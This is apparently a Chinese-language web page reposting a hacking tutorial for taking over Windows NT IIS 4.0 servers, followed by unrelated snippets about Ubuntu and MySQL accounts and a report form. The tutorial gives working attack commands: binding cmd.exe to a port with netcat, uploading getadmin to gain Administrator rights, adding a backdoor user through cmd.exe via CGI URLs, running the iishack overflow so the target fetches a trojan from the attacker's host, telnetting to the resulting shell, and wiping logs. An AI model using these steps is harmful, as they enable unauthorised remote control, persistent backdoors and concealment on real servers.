[url]http://www.xxx.com/frankie/cmd.e[/url] ... 20-t%20-e%20cmd.exe
nc -l -p 23 -t -e cmd.exe
这将把cmd.exe绑定到23端口上。
[url]http://www.xxx.com/scripts/uploadn.asp[/url]
guest和iusr_ntsvr2这两个帐号都可以进这个asp页面,在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录。
[url]http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2[/url]
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。
[url]http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:[/url]\winnt\system32\net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
[url]http://www.xxx.com/scripts/getadmin.exe?china[/url]
ftp [url]www.xxx.com[/url] Connected to [url]www.xxx.com[/url] 220 ntsvr2 Microsoft FTP Service (Version 3.0).
User ([url]www.xxx.com:[/url](none)):anonymous 331 Anonymous access allowed, send identity (e-mail name) as password.
[url]http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2[/url]
大约十多秒后屏幕显示:
CGI Error
[url]http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:[/url]\winnt\system32\net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
[url]http://www.xxx.com/cgi-bin/getadmin.exe?china[/url]
或者
[url]http://www.xxx.com/scripts/tools/getadmin.exe?china[/url]
iishack.exe ncx99.exe
[url]www.mysvr.com?[/url] 而对方的IIS server是[url]www.xxx.com[/url]
则:
iishack [url]www.xxx.com[/url] 80 [url]www.mysvr.com/ncx99.exe??[/url] (注意,不要加http://字符!)
上述命令输入后这时你应该可以看到
------(IIS 4.0 remote buffer overflow exploit)----------------- (c) dark spyrit -- [email]barns@eeye.com[/email]. [url]http://www.eEye.com[/url] [usage: iishack ] eg - iishack [url]www.xxx.com[/url] 80 [url]www.mysvr.com/thetrojan.exe[/url] do not include 'http://' before hosts! --------------------------------------------------------------- Data sent!
iishack [url]www.example.com[/url] 80 [url]www.myserver.com/netbus.exe[/url]
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务。 ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用。所以可能不一定有效。然后,用Telnet到对方的99或80端口:
Telnet [url]www.xxx.com[/url] 99
Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\>[You have full access to the system, happy browsing :)] C:\>[Add a scheduled task to restart inetinfo in X minutes] C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] C:\>[Clean up any trace or logs we might have left behind.]
这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出。
-
ubuntu添加admin权限的用户账号
ubuntu创建账号的方式通常用到两种:user
useradd ubuntu 创建用户 无密码 -
批量获取mysql用户权限的方法
批量获取mysql用户权限的方法
mysql 权限 批量 -
arthas admin权限启动
arthas程序是普通用户,所以切换用户,使得arthas程序和应用程序需要在同一个用户账号下;在root用户下执行的arthas,所以报错;
java 开发语言 arthas linux ide
举报文章
请选择举报类型
补充说明
0/200
上传截图
格式支持JPEG/PNG/JPG,图片不超过1.9M